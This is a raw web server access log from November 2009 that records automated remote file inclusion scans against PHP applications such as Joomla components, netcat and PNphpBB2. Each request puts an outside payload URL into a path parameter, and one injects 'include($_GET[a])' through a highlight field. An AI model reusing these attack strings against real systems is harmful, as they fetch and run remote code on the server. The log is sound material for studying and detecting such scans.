91.192.20.164 - - [13/Nov/2009:02:58:51 -0500] "GET /logs/access_log.Q109060300//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:02:58:51 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:02:58:51 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:02:58:51 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:02:58:52 -0500] "GET /logs/access_log.Q109060300//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:02:58:52 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:02:58:52 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:02:58:52 -0500] "GET /logs/access_log.Q109060300//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:02:58:52 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:02:58:57 -0500] "GET /logs/access_log.Q109080500%20%20//includes/ktedit/toolbar.php?dirDepth=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:59:19 -0500] "GET /playing.php/common/db.php?commonpath=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:59:19 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:59:19 -0500] "GET /logs/access_log.Q109071100%20%20/playing.php/common/db.php?commonpath=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:02:59:26 -0500] "GET /logs/error_log.Q109091400%20%20/playing.php/common/db.php?commonpath=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:00:36 -0500] "GET /logs/error_log.Q109073000/components/com_user/index.php?action=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:01:18 -0500] "GET /playing.php/common/db.php?commonpath=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:01:18 -0500] "GET /logs/access_log.Q109071100/playing.php/common/db.php?commonpath=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:01:18 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:01:24 -0500] "GET /logs/error_log.Q109091400/playing.php/common/db.php?commonpath=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:01:39 -0500] "GET //export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:01:39 -0500] "GET /logs//export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:01:39 -0500] "GET /logs/access_log.Q109082800%20%20//export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:01:39 -0500] "GET /logs/access_log.Q109081900%20%20//export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:01:47 -0500] "GET /logs/access_log.Q109073000/components/com_user/index.php?action=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
62.182.62.35 - - [13/Nov/2009:03:02:37 -0500] "GET /logs/access_log.Q109080800/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:03:02:37 -0500] "GET /templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:03:02:38 -0500] "GET /logs/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:03:02:38 -0500] "GET /logs/error_log.Q109072100/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
91.121.14.194 - - [13/Nov/2009:03:03:05 -0500] "GET //netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:03:05 -0500] "GET /logs/access_log.Q109092200//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:03:05 -0500] "GET /logs//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:03:07 -0500] "GET //netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:03:07 -0500] "GET /logs//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:03:07 -0500] "GET /logs/access_log.Q109100300//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:03:03:07 -0500] "GET /logs/.rfi%20/include/admin.lib.inc.php?site_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:03:03:07 -0500] "GET /.rfi%20/include/admin.lib.inc.php?site_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:03:03:07 -0500] "GET /logs/access_log.Q109091600%20%20/.rfi%20/include/admin.lib.inc.php?site_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:03:19 -0500] "GET //netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:03:19 -0500] "GET /logs//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:03:19 -0500] "GET /logs/access_log.Q109100300//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
189.129.3.54 - - [13/Nov/2009:03:03:28 -0500] "GET /logs/access_log.Q109092600//index.php?abg_path=http://m-aryaco.com/test/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.833"
189.129.3.54 - - [13/Nov/2009:03:03:28 -0500] "GET //index.php?abg_path=http://m-aryaco.com/test/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.833"
189.129.3.54 - - [13/Nov/2009:03:03:28 -0500] "GET /logs//index.php?abg_path=http://m-aryaco.com/test/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.833"
66.98.252.9 - - [13/Nov/2009:03:03:38 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
66.98.252.9 - - [13/Nov/2009:03:03:38 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
66.98.252.9 - - [13/Nov/2009:03:03:38 -0500] "GET /logs/access_log.Q109060400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
66.98.252.9 - - [13/Nov/2009:03:03:38 -0500] "GET /logs/access_log.Q109051700///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:03:48 -0500] "GET //netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:03:48 -0500] "GET /logs//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:03:48 -0500] "GET /logs/access_log.Q109100300%20%20//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
189.129.3.54 - - [13/Nov/2009:03:04:03 -0500] "GET /logs/error_log.Q109092600//index.php?abg_path=http://m-aryaco.com/test/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.833"
70.38.112.174 - - [13/Nov/2009:03:05:03 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:05:03 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:05:03 -0500] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:05:18 -0500] "GET //?_zb_path=http://www.hackengine.net/scan/id1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:05:18 -0500] "GET /logs/access_log.Q109083100%20%20//?_zb_path=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:05:18 -0500] "GET /logs/access_log.Q109091000%20%20//?_zb_path=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:05:18 -0500] "GET /logs//?_zb_path=http://www.hackengine.net/scan/id1?? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:05:19 -0500] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:05:19 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:05:19 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:05:33 -0500] "GET /logs/error_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:05:39 -0500] "GET /logs/error_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:06:26 -0500] "GET /logs/access_log.Q109091000//?_zb_path=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:06:31 -0500] "GET /logs/access_log.Q109083100//?_zb_path=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:06:31 -0500] "GET //?_zb_path=http://www.hackengine.net/scan/id1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:06:31 -0500] "GET /logs//?_zb_path=http://www.hackengine.net/scan/id1?? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:03:07:09 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:03:07:09 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:03:07:09 -0500] "GET /logs/error_log.Q109060700%20%20//modules/xfsection/modify.php?dir_module=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:03:07:09 -0500] "GET /logs/access_log.Q109102400%20%20//modules/xfsection/modify.php?dir_module=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:07:38 -0500] "GET //?_zb_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:07:38 -0500] "GET /logs/access_log.Q109102300%20%20//?_zb_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:07:38 -0500] "GET /logs//?_zb_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:07:38 -0500] "GET /logs/error_log.Q109102300%20%20//?_zb_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:07:40 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:07:40 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:07:50 -0500] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:07:50 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:07:55 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:07:55 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:07:56 -0500] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:08:08 -0500] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:08:21 -0500] "GET //?_zb_path=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:08:21 -0500] "GET /logs/access_log.Q109102300//?_zb_path=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:08:21 -0500] "GET /logs//?_zb_path=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:08:21 -0500] "GET //?_zb_path=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:08:21 -0500] "GET /logs/access_log.Q109102300//?_zb_path=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:08:21 -0500] "GET /logs//?_zb_path=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:08:22 -0500] "GET //?_zb_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:08:22 -0500] "GET /logs/access_log.Q109102300//?_zb_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:08:22 -0500] "GET /logs//?_zb_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:08:31 -0500] "GET /logs/error_log.Q109102300//?_zb_path=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:08:33 -0500] "GET /logs/error_log.Q109102300//?_zb_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:08:57 -0500] "GET //?_zb_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:08:57 -0500] "GET /logs/access_log.Q109102300%20%20//?_zb_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:08:57 -0500] "GET /logs//?_zb_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:09:05 -0500] "GET /logs/error_log.Q109102300%20%20//?_zb_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:09:06 -0500] "GET /logs/access_log.Q109082800//export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:09:06 -0500] "GET /logs/access_log.Q109081900//export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:09:17 -0500] "GET //?_zb_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:09:17 -0500] "GET /logs/access_log.Q109102300%20%20//?_zb_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:09:17 -0500] "GET /logs//?_zb_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:09:18 -0500] "GET /.rfi%20/include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:09:18 -0500] "GET /logs/.rfi%20/include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:09:18 -0500] "GET /logs/access_log.Q109091600%20%20/.rfi%20/include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:09:24 -0500] "GET /logs/error_log.Q109102300%20%20//?_zb_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:10:53 -0500] "GET /.rfi%20/include/admin.lib.inc.php?site_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:10:53 -0500] "GET /logs/.rfi%20/include/admin.lib.inc.php?site_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:10:54 -0500] "GET /logs/access_log.Q109091600%20%20/.rfi%20/include/admin.lib.inc.php?site_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:03:11:31 -0500] "GET /logs/access_log.Q109053100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:12:29 -0500] "GET //netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:12:29 -0500] "GET /logs//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:12:29 -0500] "GET /logs/access_log.Q109100300//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:12:36 -0500] "GET //?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:12:36 -0500] "GET /logs/access_log.Q109102400%20%20//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:12:36 -0500] "GET /logs//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:12:37 -0500] "GET //?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:12:37 -0500] "GET /logs/access_log.Q109102400%20%20//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:12:37 -0500] "GET /logs//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:03:12:40 -0500] "GET //?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:03:12:40 -0500] "GET /logs/access_log.Q109100700%20%20//?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:03:12:40 -0500] "GET /logs//?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
119.69.199.43 - - [13/Nov/2009:03:12:58 -0500] "GET /logs/error_log.Q109061400%20%20//?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:13:10 -0500] "GET //netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:13:10 -0500] "GET /logs//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:13:10 -0500] "GET /logs/access_log.Q109092200//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:13:15 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:13:15 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:13:15 -0500] "GET /logs/access_log.Q109063000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:13:15 -0500] "GET //netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:13:15 -0500] "GET /logs//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
